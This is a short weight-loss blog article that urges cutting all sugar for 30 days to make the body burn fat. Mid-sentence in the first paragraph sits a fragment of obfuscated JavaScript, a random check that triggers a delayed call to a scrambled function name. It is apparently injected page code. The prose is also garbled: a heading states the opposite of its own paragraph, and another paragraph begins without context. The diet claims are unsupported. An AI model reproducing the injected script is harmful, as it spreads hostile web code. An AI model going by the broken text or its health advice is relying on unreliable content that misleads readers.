The No Hunger Diet

This is an outdated way to look at losing weight. We know now that the best way to speed up your metabolism andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}and get your body releasing weight is to eat the RIGHT foods, not less foods. With the right eating plan, you can lose weight without feeling deprived.

Here are some of the tips that I teach my patients to permanently lose weight:

Turn your body from a fat burner to a sugar burner

The key to losing weight for good is getting your body to create energy from the stored fat it has. If you eat lots of sugar, your metabolism will always use that as energy first. If you pull sugary foods from your diet, your body goes to its second way of getting energy, which is from fat. One of the quickest ways to lose weight is to pull all sugars out of your diet. If you do this 100% for 30 days, your body will have no choice but to burn fat.

Train your body to not be weight loss resistant

The reason is they go on calorie restricted diets which do nothing for changing why their body gained weight in the first place. If that is you, the first step to losing weight is to train your body to stop packing on the pounds.
